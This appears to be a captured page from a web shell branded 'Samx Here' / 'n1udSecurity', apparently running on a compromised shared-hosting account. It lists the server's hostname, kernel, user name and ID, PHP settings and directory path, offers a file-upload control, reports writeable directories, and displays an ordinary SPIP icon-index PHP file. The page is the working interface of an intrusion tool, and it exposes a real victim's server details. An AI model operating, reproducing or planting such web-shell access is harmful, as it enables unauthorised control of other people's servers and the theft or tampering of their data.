Samx Here
n1udSecurity


Server : Apache
System : Linux webd348.cluster026.gra.hosting.ovh.net 5.15.148-ovh-vps-grsec-zfs-classid #1 SMP Thu Feb 8 09:41:04 UTC 2024 x86_64
User : hednacluml ( 122243)
PHP Version : 8.3.9
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
Directory :  /home/hednacluml/dieu/prive/images/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/hednacluml/dieu/prive/images/index.php
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
	<title>Index des icones de Spip</title>
	<link rel="up" href="../">
</head>
<body>
<center>
	<h1>Index des icones de <a href='https://www.spip.net'>Spip</a></h1>
	<table>
		<?php
		$myDir = opendir('.');
		while ($file = readdir($myDir)) {
			if (preg_match(',\.(png|gif)$,i', $file)) {
				echo "		<tr><td>$file</td><td><img src='$file' alt='$file' /></td></tr>\n";
			}
		}
		?>
	</table>
</center>
</body>
</html>

SAMX